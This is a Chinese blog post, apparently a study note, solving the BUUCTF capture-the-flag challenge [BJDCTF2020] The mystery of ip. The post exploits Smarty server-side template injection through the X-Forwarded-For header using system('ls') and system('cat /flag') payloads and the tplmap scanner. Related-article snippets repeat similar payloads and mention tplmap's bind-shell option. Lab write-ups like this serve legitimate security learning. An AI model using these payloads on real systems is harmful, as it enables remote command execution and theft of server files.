【学习笔记 37】 buu [BJDCTF2020]The mystery of ip

最新推荐文章于 2023-07-11 23:56:30 发布
最新推荐文章于 2023-07-11 23:56:30 发布
阅读量368 收藏 1
点赞数 1
分类专栏: ctf 学习笔记 SSTI 文章标签: 安全 url
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43553654/article/details/107727345
版权
学习笔记 同时被 3 个专栏收录
50 篇文章 1 订阅
订阅专栏
ctf
47 篇文章 1 订阅
订阅专栏
SSTI
2 篇文章 0 订阅
订阅专栏

0x00 知识点

  1. tplmap探测是否存在模板注入漏洞
  2. smartly模板注入

0x01 知识点详解

  1. tplmap的使用方法?
    答:这里只用到python tplmap.py -u 'curl',想了解详情的话这里附上一篇大佬的博客。
  2. 什么是smartly模板引擎注入?
    答:这里参考这篇文章

解题思路

  1. 打开网站一看在这里插入图片描述
    就看到了他提示的flag,那还不点开看看
    在这里插入图片描述
    提示到了我的IP,这一瞬间就让我想到了http的请求头里的XXF参数和Client-ip参数,想了解http请求头详情的请去看我的上一篇文章

  2. 接下来用burp抓了一下包尝试改了一下XFF发现这个ip确实是可控的,接下来就有点没什么思路了,后来在大佬的提示下知道了这个是ssti模板注入漏洞。那就构造payload尝试一下

X-Forwarded-for:127.0.0.1{{system('ls')}}

在这里插入图片描述可以直接看到回显。接下里继续构造payload尝试得到flag

X-Forwarded-for:127.0.0.1{{system('cat /flag')}}

在这里插入图片描述后来用tplmap扫过才知道这个是smartly模板注入,正常的payload应该是

{if system('cat ../../../flag')}{/if}

不过好像影响不大。

Noslpum
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
学习笔记 38】 buu [BJDCTF2020]The mystery of ip
weixin_43553654的博客
08-01 242
0x00 知识点 base_convert函数的利用 bin2hex和hex2bin函数 代码审计 0x01 知识点详解 base_convert函数的作用? 答:base_convert() 函数在任意进制之间转换数字。 bin2hex和hex2bin函数的作用? 答:hex2bin() 函数把十六进制值的字符串转换为 ASCII 字符。 bin2hex() 函数把 ASCII 字符的字符串转换为十六进制值。字符串可通过使用 pack() 函数再转换回去。 0x02 解题思路 1.打开网站就直接看
tplmap:服务器端模板注入和代码注入检测与开发工具
05-03
Tplmap 该项目不再维护。 我很高兴合并新的PR,只要它们不会破坏。 Tplmap通过许多沙箱转义技术来帮助利用代码注入和服务器端模板注入漏洞来访问底层操作系统。 开发该工具及其测试套件是为了研究SSTI漏洞类别,并在Web应用程序渗透测试期间用作攻击性安全工具。 沙盒突破技术来自James Kett的 ,其他公共研究 ,以及对该工具的原始贡献 。 它可以利用几种代码上下文和盲注场景。 它还在Python,Ruby,PHP,Java和通用的未沙盒化模板引擎中支持类似eval()的代码注入。 服务器端模板注入 假设您正在审核使用由用户提供的值组成的模板来生成动态页面的网站,例如以Python和编写的此Web应用程序以不安全的方式使用模板引擎。 from flask import Flask , request from jinja2 import Environment
[SSTI自动化工具]TPLMap安装&使用说明
m0_61155226的博客
07-11 1289
d DATA, --data=.. 通过POST发送的数据字符串 它必须作为查询字符串: param1=value1¶m2=value2。-c COOKIES, --co.. Cookies (e.g. 'Field1=Value1') 多次使用以添加新的Cookie。-H HEADERS, --he.. 附加标头 (e.g. 'Header1: Value1') 多次使用以添加新的标头。--bind-shell=BIN.. 在目标的TCP端口上生成系统Shell并连接到它。
SSTI漏洞检测工具tplmap的安装与使用
weixin_42194536的博客
05-04 892
参考:[https://www.cnblogs.com/ktsm/p/15473100.html]
SSTI注入神器tplmap安装教程
u011250160的博客
12-19 2694
必须吐槽:既然tplmap那么强,为什么没有python3版本的啊 tplmap下载地址 https://github.com/epinna/tplmap 直接git clone也行 git clone https://github.com.cnpmjs.org/epinna/tplmap.git Python环境:2.7 Python所需要的包: PyYAML5.1.2 certifi2018.10.15 chardet3.0.4 idna2.8 requests2.22.0 urllib31.24.1
BUUCTF】[BJDCTF2020]The mystery of ip
aoao331198的博客
04-23 365
X-Forwarded-For 看到题目,要首先想到这个 BP在http头里面增加X-Forwarded-For,发现是可控的,可能存在模板注入 让X-Forwarded-For={{7*7}} 接下来常规思路注入命令 X-Forwarded-For={{system("cat /flag")}} 过程没什么好说的,贴一下源码 <?php require_once('header.php'); require_once('./libs/Smarty.class.php'); $
The HMT effects on the nucleon collective flows in BUU transport model
03-14
基于BUU模型利用集体流研究HMT效应,张芳,,基于半经典的BUU输运模型,我们利用中-质微分流、中子-质子流之差以及质子椭圆流研究了核内核子动量分布的高动量尾巴(HMT)效应。研
BUU 论坛的编辑器163Editor
09-21
"BUU 论坛的编辑器163Editor"是一个专为BUU论坛设计的文本编辑工具,它可能集成了丰富的富文本编辑功能,让用户在论坛发帖或回帖时可以方便地添加格式化文本、图片、链接等元素,提升交互体验。"DianUbb.rar"是这个...
2020网鼎杯青龙组Boom
05-12
【标题】"2020网鼎杯青龙组Boom" 涉及的是一个网络安全竞赛的场景,其中"网鼎杯"是中国国内知名的网络安全技术大赛,旨在提升参赛者的网络安全技能和应急处理能力。"青龙组"可能是比赛中的一个分组或者阶段,可能...
Majin Buu Top HD Anime New Tabs Theme-crx插件
03-15
魔鬼的布欧(the devil,Buu),日本动漫《七龙珠》中的义与恶的角色,是《七龙珠》综合实力最强的BOSS。 这个名字来自电影“灰姑娘”中的咒语“ Bibidi Barbidibou”,分为三个,Bibi是制片人,Babidi是去除魔鬼...
tplmap.zip
07-26
此工具类似于sqlmap,用于ssti漏洞,可一键进行模板注入。啊啊啊啊啊啊啊啊啊啊啊啊啊啊啊啊啊 。。。。。。。。。。。。。。。。。。。。。。。
POSN:POSN-BUU的源代码
04-01
POSN-BUU可能是该系统的一个特定实现或者模块,主要用于处理BUU(Base Unit Unit,基本单元)相关的定位任务。这个源代码是用C++编程语言编写的,C++是一种通用且高效的编程语言,特别适合开发对性能要求高的系统...
CTF之路:利用tplmap实现SSTI模板注入
zw05011的博客
01-08 3735
1.题目 SSTI -Simple2 提示了SSTI,提示了参数flag。显示这是一道以flag为参数的SSTI模板注入题目 因此,使用模板注入工具tplmap来解题。 2.知识点 kali 下安装tplmap 1.安装kali下的python2的pip工具 kali2020版及以上, 输入python2命令会执行python2, python3也存在。 但pip默认是pip3, 而我们需要的是pip2, 所以我们需要先安装pip2 # 进入/home/kali目录 cd #下载pip2安装脚本 wge
tplmap的安装和使用
a_jk_1234的博客
10-10 742
pass
buuctf-[BJDCTF2020]The mystery of ip(小宇特详解)
小宇的web博客
02-10 2197
buuctf-[BJDCTF2020]The mystery of ip(小宇特详解) 1.先看题目 这里找不到线索就抓包找 依次找flag.php,hint.php,index.php. 2.这里重新抓包flag.php进行分析 这里在重发器中加入client-ip:66尝试修改ip 这里会发现能够修改flag中的ip 这里想到命令执行 尝试系统命令client-ip:{system(‘ls’)}发现可以,然后尝试client-ip:{system(‘cat/flag’)} ...
BUUCTF [BJDCTF2020] The mystery of ip
Senimo
12-19 1608
BUUCTF [BJDCTF2020] The mystery of ip 考点: X-Forwarded-For注入 PHP可能存在Twig模版注入漏洞 启动环境: 查看flag页面: 查看hint页面: 结合题目名,IP的秘密,flag页面也出现了IP,猜测为X-Forwarded-For处有问题 使用BurpSuite抓取数据包: 添加HTTP请求头: X-Forwarded-For: 1 发送数据包,得到回显页面: 被成功执行,说明XFF可控,测试了半天,因为是php页面,所以没想
BUUCTF-web类-[BJDCTF2020]The mystery of ip
weixin_44622228的博客
04-19 1529
BUUCTF-web类-[BJDCTF2020]The mystery of ip 这是一道很有意思的题目。 靶机首页 有Flag和Hint按钮,查看Flag试试 发现有我们本机IP的回显,很有可能是http请求头中有XFF信息将我们ip一起带过去了,我们先试试伪造XFF头看看情况。 发现确实是会变化,第一步猜想有没有可能是XFF注入? 我简单了在xff后面加了单引号,也在sqlmap上跑了一下,...
Tplmap用法
热门推荐
stybill的博客
06-27 4万+
Tplmap下载:安装包可查看我的下载资源页面 Python环境:2.7 (这一点很重要很重要很重要) Python所需要的包: PyYAML5.1.2 certifi2018.10.15 chardet3.0.4 idna2.8 requests2.22.0 urllib31.24.1 wsgiref==0.1.2 (这些包只有在python2.X中才有安装) 进入到sqlmap.py目录下,运行命令行窗口: 命令:python tplmap.py -u “URL/?flag” -u指定URL的地址 ?
buu cipher
最新发布
10-23
Buu Cipher 的加密过程可以简单地分为两个步骤:混淆和扩散。 首先,混淆步骤使用一个密钥和置换表对明文进行置换。置换表是由密钥生成的,用于打乱明文中字符的顺序。这样,原本明文中相邻的字符将被分散到密文中...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值